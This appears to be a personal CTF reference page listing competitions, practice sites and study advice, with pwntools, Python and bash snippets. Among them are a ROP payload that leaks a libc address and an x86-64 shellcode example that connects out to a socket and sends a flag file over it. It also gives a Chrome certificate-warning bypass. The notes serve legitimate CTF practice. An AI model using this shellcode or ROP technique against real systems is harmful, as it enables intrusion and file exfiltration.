CTF Main Page

main()

General Resources

• CyberChef
• Zardus
• Hammond
• Zaratec

• r/hacking

• SecLists
• Command not found

Competitions

• CTFtime
• Cyber Skyline
• Pico
• Presidents Cup (January)
• USCG (usually May)
• Flare On Challenge (usually September)
• NSA Codebreaker Challenge (usually fall)
• Reply Cyber Security Challenge (usually October)
• rapid7 CTF (usually late fall/winter)
• Advent of Code (Coding challs, not really a CTF)
• CyberStakes

Always Open/Skill Building

• OverTheWire
• PicoCTF
• Web Security Academy
• PWN College
• pwnable.kr/pwnable.tw/pwnable.xyz
• Embedded Security CTF
• reversing.kr
• Cryptohack
• OOO challs
• FlagYard

Lessons Learned

• Preparation
  • Have a good environment that’s ready to go and easily revertible
  • Should already have solutions for common challenges
• Competing
  • Don’t do the easiest problem, do the one where you’ll learn the most
  • Don’t give up on a problem too quickly
  • Take good notes of all the things you learn/save problems and solutions
  • If you don’t solve a problem, find a writeup
  • Improve on old scripts as you do new challenges/read writeups
• Practice, practice, practice
  • Focus on the things you’re not good at
  • Try difficult challenges from archived, more popular CTFs
  • Read writeups when you have time, but focus on well-written ones, preferably from challenges you attempted
  • Work on automating tasks for when you see them again
• When working on a challenge…
  • If something seems suspicious, it’s probably for a reason
  • Don’t write something new when a tool already exists (you can improve it after the comp)

---

General Tools

• [git blame-someone-else]
• Base Pwntools Script/GDB file
• PoW Solver
• Word Regex Search

Random Notes

pwntools

• xor()

libc = ELF("./whatever.so")
libc.sym["system"]
pop_rdi_ret = main_exe.sym['main'] + x
puts_got = main_exe.sym['got.puts']
puts_in_prog = main_exe.sym['main'] + y
payload = p64(pop_rdi_ret) + p64(puts_got) + p64(puts_in_prog)
DATA = ELF("./binary").section(".data")

# rop = ROP(EXE)
# rop.write(1,2,3)
# rop.dump()

example shellcode
shellc = asm ('''
socket:
        push 41
        pop rax
        cdq
        push 2
        pop rdi
        push 1
        pop rsi
    syscall
    mov rbp,rax
connect:
    xchg eax,edi
    mov al,42
        mov rcx,%s
        neg rcx
        push rcx
    mov rsi,rsp
        mov dl,16
        syscall

    xor rdi,rdi
    lea rsi,fname[rip]
    xor rdx,rdx
    xor r10,r10
    xor rax,rax
        mov ax,257
        syscall

    mov rdi,rbp
    mov rsi,rax
    mov rdx,0
    mov r10,100
        xor rax,rax
    mov al,40
    syscall
    push 60
    pop rax
    syscall
fname:
    .ascii "/home/fbi/flag.txt"

''' % (sockaddr()))

>>> assembly = shellcraft.echo("Hello world!\n")
>>> io = gdb.debug_assembly(assembly)
>>> io.recvline()
b'Hello world!\n'

>>> assembly = shellcraft.echo("Hello world!\n")
>>> shellcode = asm(assembly)
>>> io = gdb.debug_shellcode(shellcode)
>>> io.recvline()
b'Hello world!\n'

r.stream()
r.interactive()
r.recv(1024)
r.recvuntil("needle")
r.unrecv("needle")
r.recvline(keepends=False)
recvline_contains("needle")
r.recvlines(2)
r.recvline(timeout = 10)
r.send("part1")
also regex functions
r.sendline("full")
r.sendlineafter("full", "exploit") -> recv "full" then send "exploit"
r.sendlinethen("full", "exploit") -> send "exploit" then recv "full"
log.info("Testing...")
print(p32(0x12345678))
print(p64(0x12345678))
print(p16(22))
print(u32('\xffA\x20\x18'))
print(hex(u32('\xffA\x20\x18')))

IPython

• %debug
• %run -d [script]

Itertools

import itertools
import string
alphabet = string.ascii_letters + string.digits + "_ {}"
for i in itertools.product(alphabet, repeat=3): # AA AB AC AD BA BB BC BD CA CB CC CD DA DB DC DD
for i in itertools.permutations(alphabet, 3): # AB AC AD BA BC BD CA CB CD DA DB DC
for i in itertools.combinations(alphabet, 3): # AB AC AD BC BD CD
for i in itertools.combinations_with_replacement(alphabet, 3): # AA AB AC AD BB BC BD CC CD DD
	guess = "".join(i)

Counter

• Examples

Bash Commands/Shortcuts

• ![command]
• !!
• !$
• find / -iname [name]
• grep -i -r flag .
• xargs
• cd -
• hostname -I
• whereis/which
• tail -f
• https://www.tecmint.com/linux-command-line-bash-shortcut-keys/
• https://www.howtogeek.com/howto/ubuntu/keyboard-shortcuts-for-bash-command-shell-for-ubuntu-debian-suse-redhat-linux-etc/
• https://itsfoss.com/linux-command-tricks/
• https://www.ostechnix.com/list-useful-bash-keyboard-shortcuts/

Python Notes

• dir() to show methods/attributes
• zip(iterator1, iterator2, iterator3 ...)
• map(func, iter) map(lambda x: x + x, [1, 2, 3])
• x = lambda a, b, c : a + b + c print(x(5, 6, 2))
• any(iterable)/all(iterable)

# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
 
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

Chrome

• On bad cert page: thisisunsafe lets you load it anyway
• Ctrl+n Ctrl+t Ctrl+Shift+t open tabs/windows
• Ctrl+tab or Ctrl+pg up/down to switch tabs
• Ctrl+l goes to search bar